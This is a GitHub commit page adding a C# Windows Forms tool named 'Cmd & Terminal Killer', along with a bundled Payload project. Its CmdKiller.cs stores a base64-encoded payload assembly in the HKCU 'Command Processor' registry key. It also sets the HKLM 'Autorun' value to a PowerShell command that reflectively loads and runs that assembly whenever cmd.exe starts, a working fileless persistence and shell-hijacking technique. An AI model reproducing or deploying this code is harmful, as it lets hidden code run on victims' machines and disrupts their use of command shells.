-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
mastercodeon314
committed
Sep 23, 2023
1 parent
3854d68
commit 4d986c2
Showing
58 changed files
with
6,973 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,56 @@ | ||
|
|
||
| Microsoft Visual Studio Solution File, Format Version 12.00 | ||
| # Visual Studio Version 17 | ||
| VisualStudioVersion = 17.7.34018.315 | ||
| MinimumVisualStudioVersion = 10.0.40219.1 | ||
| Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Cmd & Terminal Killer", "Cmd & Terminal Killer\Cmd & Terminal Killer.csproj", "{2E0AAE08-15E1-4D46-8D86-F1DD399F3B38}" | ||
| EndProject | ||
| Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DarkControls", "DarkControls\DarkControls.csproj", "{66C94ACB-63C7-42A3-9D83-A3801CED4F1C}" | ||
| EndProject | ||
| Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Payload", "Payload\Payload.csproj", "{7073E57A-9092-43EE-B105-5525F140355E}" | ||
| EndProject | ||
| Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{B723150F-EC32-4B4D-8B13-86BFEDC41C22}" | ||
| ProjectSection(SolutionItems) = preProject | ||
| README.md = README.md | ||
| EndProjectSection | ||
| EndProject | ||
| Global | ||
| GlobalSection(SolutionConfigurationPlatforms) = preSolution | ||
| Debug|Any CPU = Debug|Any CPU | ||
| Debug|x64 = Debug|x64 | ||
| Release|Any CPU = Release|Any CPU | ||
| Release|x64 = Release|x64 | ||
| EndGlobalSection | ||
| GlobalSection(ProjectConfigurationPlatforms) = postSolution | ||
| {2E0AAE08-15E1-4D46-8D86-F1DD399F3B38}.Debug|Any CPU.ActiveCfg = Debug|Any CPU | ||
| {2E0AAE08-15E1-4D46-8D86-F1DD399F3B38}.Debug|Any CPU.Build.0 = Debug|Any CPU | ||
| {2E0AAE08-15E1-4D46-8D86-F1DD399F3B38}.Debug|x64.ActiveCfg = Debug|x64 | ||
| {2E0AAE08-15E1-4D46-8D86-F1DD399F3B38}.Debug|x64.Build.0 = Debug|x64 | ||
| {2E0AAE08-15E1-4D46-8D86-F1DD399F3B38}.Release|Any CPU.ActiveCfg = Release|Any CPU | ||
| {2E0AAE08-15E1-4D46-8D86-F1DD399F3B38}.Release|Any CPU.Build.0 = Release|Any CPU | ||
| {2E0AAE08-15E1-4D46-8D86-F1DD399F3B38}.Release|x64.ActiveCfg = Release|x64 | ||
| {2E0AAE08-15E1-4D46-8D86-F1DD399F3B38}.Release|x64.Build.0 = Release|x64 | ||
| {66C94ACB-63C7-42A3-9D83-A3801CED4F1C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU | ||
| {66C94ACB-63C7-42A3-9D83-A3801CED4F1C}.Debug|Any CPU.Build.0 = Debug|Any CPU | ||
| {66C94ACB-63C7-42A3-9D83-A3801CED4F1C}.Debug|x64.ActiveCfg = Debug|x64 | ||
| {66C94ACB-63C7-42A3-9D83-A3801CED4F1C}.Debug|x64.Build.0 = Debug|x64 | ||
| {66C94ACB-63C7-42A3-9D83-A3801CED4F1C}.Release|Any CPU.ActiveCfg = Release|Any CPU | ||
| {66C94ACB-63C7-42A3-9D83-A3801CED4F1C}.Release|Any CPU.Build.0 = Release|Any CPU | ||
| {66C94ACB-63C7-42A3-9D83-A3801CED4F1C}.Release|x64.ActiveCfg = Release|x64 | ||
| {66C94ACB-63C7-42A3-9D83-A3801CED4F1C}.Release|x64.Build.0 = Release|x64 | ||
| {7073E57A-9092-43EE-B105-5525F140355E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU | ||
| {7073E57A-9092-43EE-B105-5525F140355E}.Debug|Any CPU.Build.0 = Debug|Any CPU | ||
| {7073E57A-9092-43EE-B105-5525F140355E}.Debug|x64.ActiveCfg = Debug|x64 | ||
| {7073E57A-9092-43EE-B105-5525F140355E}.Debug|x64.Build.0 = Debug|x64 | ||
| {7073E57A-9092-43EE-B105-5525F140355E}.Release|Any CPU.ActiveCfg = Release|Any CPU | ||
| {7073E57A-9092-43EE-B105-5525F140355E}.Release|Any CPU.Build.0 = Release|Any CPU | ||
| {7073E57A-9092-43EE-B105-5525F140355E}.Release|x64.ActiveCfg = Release|x64 | ||
| {7073E57A-9092-43EE-B105-5525F140355E}.Release|x64.Build.0 = Release|x64 | ||
| EndGlobalSection | ||
| GlobalSection(SolutionProperties) = preSolution | ||
| HideSolutionNode = FALSE | ||
| EndGlobalSection | ||
| GlobalSection(ExtensibilityGlobals) = postSolution | ||
| SolutionGuid = {FA6C112F-2C80-4BC3-B14A-346EB350862B} | ||
| EndGlobalSection | ||
| EndGlobal |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,6 @@ | ||
| <?xml version="1.0" encoding="utf-8" ?> | ||
| <configuration> | ||
| <startup> | ||
| <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" /> | ||
| </startup> | ||
| </configuration> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,120 @@ | ||
| <?xml version="1.0" encoding="utf-8"?> | ||
| <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | ||
| <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" /> | ||
| <PropertyGroup> | ||
| <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration> | ||
| <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform> | ||
| <ProjectGuid>{2E0AAE08-15E1-4D46-8D86-F1DD399F3B38}</ProjectGuid> | ||
| <OutputType>WinExe</OutputType> | ||
| <RootNamespace>Cmd___Terminal_Killer</RootNamespace> | ||
| <AssemblyName>Cmd & Terminal Killer</AssemblyName> | ||
| <TargetFrameworkVersion>v4.8</TargetFrameworkVersion> | ||
| <FileAlignment>512</FileAlignment> | ||
| <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects> | ||
| <Deterministic>true</Deterministic> | ||
| </PropertyGroup> | ||
| <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' "> | ||
| <PlatformTarget>AnyCPU</PlatformTarget> | ||
| <DebugSymbols>true</DebugSymbols> | ||
| <DebugType>full</DebugType> | ||
| <Optimize>false</Optimize> | ||
| <OutputPath>bin\Debug\</OutputPath> | ||
| <DefineConstants>DEBUG;TRACE</DefineConstants> | ||
| <ErrorReport>prompt</ErrorReport> | ||
| <WarningLevel>4</WarningLevel> | ||
| </PropertyGroup> | ||
| <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' "> | ||
| <PlatformTarget>AnyCPU</PlatformTarget> | ||
| <DebugType>pdbonly</DebugType> | ||
| <Optimize>true</Optimize> | ||
| <OutputPath>bin\Release\</OutputPath> | ||
| <DefineConstants>TRACE</DefineConstants> | ||
| <ErrorReport>prompt</ErrorReport> | ||
| <WarningLevel>4</WarningLevel> | ||
| <Prefer32Bit>true</Prefer32Bit> | ||
| </PropertyGroup> | ||
| <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'"> | ||
| <DebugSymbols>true</DebugSymbols> | ||
| <OutputPath>bin\Debug\</OutputPath> | ||
| <DefineConstants>DEBUG;TRACE</DefineConstants> | ||
| <DebugType>full</DebugType> | ||
| <PlatformTarget>x64</PlatformTarget> | ||
| <LangVersion>7.3</LangVersion> | ||
| <ErrorReport>prompt</ErrorReport> | ||
| <Prefer32Bit>true</Prefer32Bit> | ||
| </PropertyGroup> | ||
| <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'"> | ||
| <OutputPath>bin\Release\</OutputPath> | ||
| <DefineConstants>TRACE</DefineConstants> | ||
| <Optimize>true</Optimize> | ||
| <DebugType>pdbonly</DebugType> | ||
| <PlatformTarget>x64</PlatformTarget> | ||
| <LangVersion>7.3</LangVersion> | ||
| <ErrorReport>prompt</ErrorReport> | ||
| </PropertyGroup> | ||
| <ItemGroup> | ||
| <Reference Include="Newtonsoft.Json, Version=13.0.0.0, Culture=neutral, PublicKeyToken=30ad4fe6b2a6aeed, processorArchitecture=MSIL"> | ||
| <HintPath>..\packages\Newtonsoft.Json.13.0.3\lib\net45\Newtonsoft.Json.dll</HintPath> | ||
| </Reference> | ||
| <Reference Include="System" /> | ||
| <Reference Include="System.Core" /> | ||
| <Reference Include="System.Xml.Linq" /> | ||
| <Reference Include="System.Data.DataSetExtensions" /> | ||
| <Reference Include="Microsoft.CSharp" /> | ||
| <Reference Include="System.Data" /> | ||
| <Reference Include="System.Deployment" /> | ||
| <Reference Include="System.Drawing" /> | ||
| <Reference Include="System.Net.Http" /> | ||
| <Reference Include="System.Windows.Forms" /> | ||
| <Reference Include="System.Xml" /> | ||
| </ItemGroup> | ||
| <ItemGroup> | ||
| <Compile Include="Form1.cs"> | ||
| <SubType>Form</SubType> | ||
| </Compile> | ||
| <Compile Include="Form1.Designer.cs"> | ||
| <DependentUpon>Form1.cs</DependentUpon> | ||
| </Compile> | ||
| <Compile Include="Logger.cs" /> | ||
| <Compile Include="Program.cs" /> | ||
| <Compile Include="Properties\AssemblyInfo.cs" /> | ||
| <Compile Include="CmdKiller.cs" /> | ||
| <Compile Include="WinTermKiller.cs" /> | ||
| <EmbeddedResource Include="Form1.resx"> | ||
| <DependentUpon>Form1.cs</DependentUpon> | ||
| </EmbeddedResource> | ||
| <EmbeddedResource Include="Properties\Resources.resx"> | ||
| <Generator>ResXFileCodeGenerator</Generator> | ||
| <LastGenOutput>Resources.Designer.cs</LastGenOutput> | ||
| <SubType>Designer</SubType> | ||
| </EmbeddedResource> | ||
| <Compile Include="Properties\Resources.Designer.cs"> | ||
| <AutoGen>True</AutoGen> | ||
| <DependentUpon>Resources.resx</DependentUpon> | ||
| <DesignTime>True</DesignTime> | ||
| </Compile> | ||
| <None Include="packages.config" /> | ||
| <None Include="Properties\Settings.settings"> | ||
| <Generator>SettingsSingleFileGenerator</Generator> | ||
| <LastGenOutput>Settings.Designer.cs</LastGenOutput> | ||
| </None> | ||
| <Compile Include="Properties\Settings.Designer.cs"> | ||
| <AutoGen>True</AutoGen> | ||
| <DependentUpon>Settings.settings</DependentUpon> | ||
| <DesignTimeSharedInput>True</DesignTimeSharedInput> | ||
| </Compile> | ||
| </ItemGroup> | ||
| <ItemGroup> | ||
| <None Include="App.config" /> | ||
| </ItemGroup> | ||
| <ItemGroup> | ||
| <ProjectReference Include="..\DarkControls\DarkControls.csproj"> | ||
| <Project>{66c94acb-63c7-42a3-9d83-a3801ced4f1c}</Project> | ||
| <Name>DarkControls</Name> | ||
| </ProjectReference> | ||
| </ItemGroup> | ||
| <ItemGroup> | ||
| <None Include="Payload.exe" /> | ||
| </ItemGroup> | ||
| <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" /> | ||
| </Project> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,143 @@ | ||
| using System; | ||
| using System.Collections.Generic; | ||
| using System.Linq; | ||
| using System.Security.Principal; | ||
| using System.Text; | ||
| using System.Threading.Tasks; | ||
| using Microsoft.Win32; | ||
|
|
||
| namespace Cmd___Terminal_Killer | ||
| { | ||
| public class CmdKiller | ||
| { | ||
| static void emptyLine() | ||
| { | ||
| Form1.logger.Log(""); | ||
| } | ||
|
|
||
| static void log(string msg) | ||
| { | ||
| Form1.logger.Log("[Cmd Killer] " + msg); | ||
| } | ||
|
|
||
| public static void Install() | ||
| { | ||
| log(" ### Installing Cmd Killer ###"); | ||
|
|
||
| log("Checking if \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Command Processor\" registry exists and creating it if it does not..."); | ||
| CheckForAndCreate_HKLM(); | ||
|
|
||
| log("Checking if \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Command Processor\" registry exists and creating it if it does not..."); | ||
| CheckForAndCreate_HKCU(); | ||
|
|
||
| log("Setting registry value of \"Autorun\" in registry key \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Command Processor\""); | ||
| SetHKLM_Autorun(); | ||
|
|
||
| log("Dumping payload to value of \"HideConsole\" in registry key \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Command Processor\""); | ||
| SetHKCU_Bins(); | ||
|
|
||
| log("Installed!"); | ||
| emptyLine(); | ||
| } | ||
|
|
||
| public static void Uninstall() | ||
| { | ||
| log(" ### Uninstalling Cmd Killer ###"); | ||
|
|
||
| log("Deleting registry value of \"Autorun\" in registry key \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Command Processor\""); | ||
| DeleteHKLM_Autorun(); | ||
|
|
||
| log("Deleting registry value of \"HideConsole\" in registry key \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Command Processor\""); | ||
| RemoveHKCU_Bins(); | ||
|
|
||
| log("Uninstalled!"); | ||
| emptyLine(); | ||
| } | ||
|
|
||
| public static bool RegistryKeyExists(RegistryHive hive, string subKey) | ||
| { | ||
| using (var baseKey = RegistryKey.OpenBaseKey(hive, RegistryView.Registry64)) | ||
| using (var key = baseKey.OpenSubKey(subKey)) | ||
| { | ||
| return key != null; | ||
| } | ||
| } | ||
|
|
||
| public static void SetHKLM_Autorun() | ||
| { | ||
|
|
||
| RegistryKey key = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64).OpenSubKey(@"Software\Microsoft\Command Processor", RegistryKeyPermissionCheck.ReadWriteSubTree); | ||
| key.SetValue("Autorun", "powershell.exe -c [Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemPropertyValue -Path 'Registry::HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor' -Name 'HideConsole'))).EntryPoint.Invoke($null, @());", RegistryValueKind.String); | ||
| key.Close(); | ||
| } | ||
|
|
||
| public static void DeleteHKLM_Autorun() | ||
| { | ||
| try | ||
| { | ||
| RegistryKey key = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64).OpenSubKey(@"Software\Microsoft\Command Processor", RegistryKeyPermissionCheck.ReadWriteSubTree); | ||
| // Open the registry key for writing | ||
| key.DeleteValue("Autorun"); | ||
| key.Close(); | ||
| } | ||
| catch (System.ArgumentException ex) | ||
| { | ||
| if (ex.Message.Contains( "No value exists with that name.")) | ||
| { | ||
| log("Autorun value does not exist! Skipping!"); | ||
| } | ||
| } | ||
| } | ||
|
|
||
| public static void SetHKCU_Bins() | ||
| { | ||
| RegistryKey key = RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Registry64).OpenSubKey(@"Software\Microsoft\Command Processor", RegistryKeyPermissionCheck.ReadWriteSubTree); | ||
| key.SetValue("HideConsole", Convert.ToBase64String(Properties.Resources.Payload), RegistryValueKind.String); | ||
| key.Close(); | ||
| } | ||
|
|
||
| public static void RemoveHKCU_Bins() | ||
| { | ||
| try | ||
| { | ||
| RegistryKey key = RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Registry64).OpenSubKey(@"Software\Microsoft\Command Processor", RegistryKeyPermissionCheck.ReadWriteSubTree); | ||
| key.DeleteValue("HideConsole"); | ||
| key.Close(); | ||
| } | ||
| catch (System.ArgumentException ex) | ||
| { | ||
| if (ex.Message.Contains("No value exists with that name.")) | ||
| { | ||
| log("HideConsole value does not exist! Skipping!"); | ||
| } | ||
| } | ||
|
|
||
| } | ||
|
|
||
| public static void CheckForAndCreate_HKLM() | ||
| { | ||
| // Check if the registry key exists | ||
| bool keyExists = RegistryKeyExists(RegistryHive.LocalMachine, @"Software\Microsoft\Command Processor"); | ||
|
|
||
| if (!keyExists) | ||
| { | ||
| RegistryKey key = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64); | ||
| key.CreateSubKey(@"Software\Microsoft\Command Processor"); | ||
| key.Close(); | ||
| } | ||
| } | ||
|
|
||
| public static void CheckForAndCreate_HKCU() | ||
| { | ||
| // Check if the registry key exists | ||
| bool keyExists = RegistryKeyExists(RegistryHive.CurrentUser, @"Software\Microsoft\Command Processor"); | ||
|
|
||
| if (!keyExists) | ||
| { | ||
| RegistryKey key = RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Registry64); | ||
| key.CreateSubKey(@"Software\Microsoft\Command Processor"); | ||
| key.Close(); | ||
| } | ||
| } | ||
| } | ||
| } |
Oops, something went wrong.